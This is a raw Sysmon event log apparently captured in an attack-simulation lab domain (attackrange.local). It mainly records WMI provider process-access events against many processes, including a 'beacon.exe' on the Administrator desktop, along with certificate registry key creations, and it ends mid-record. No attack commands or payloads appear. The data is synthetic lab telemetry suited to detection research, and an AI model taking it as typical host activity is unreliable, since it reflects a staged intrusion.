Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EC-6170-2F5F-01000000F101}5272C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EC-6170-2E5F-01000000F101}6472C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EB-6170-2C5F-01000000F101}3800C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-FE47-616E-9A3C-01000000F101}2108C:\Windows\system32\mmc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-FA24-616E-E33B-01000000F101}5080C:\Windows\system32\mmc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-92C8-616D-4F11-01000000F101}5316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-92C8-616D-4E11-01000000F101}6812C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-E46E-6165-1E2A-00000000F101}4584C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 10341000x800000000000000057348672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-ACEA-6164-3305-00000000F101}3452C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057348669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\xml\wmi2xml.dll10.0.14393.0 (rs1_release.160715-1616)WMI XML ConvertorMicrosoft® Windows® Operating SystemMicrosoft Corporationwmi2xml.DLLMD5=DF861EE7A64473D2413A7318D8B97F6F,SHA256=C7789C6A4BEC11838ECB46C0B411172A0E179AE411B1C11BF073A5253FB5674BtrueMicrosoft WindowsValid 12241200x800000000000000057348668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.805{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 10341000x800000000000000057348660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-891D-6164-C500-00000000F101}2944C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.805{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-88F7-6164-B700-00000000F101}4468C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 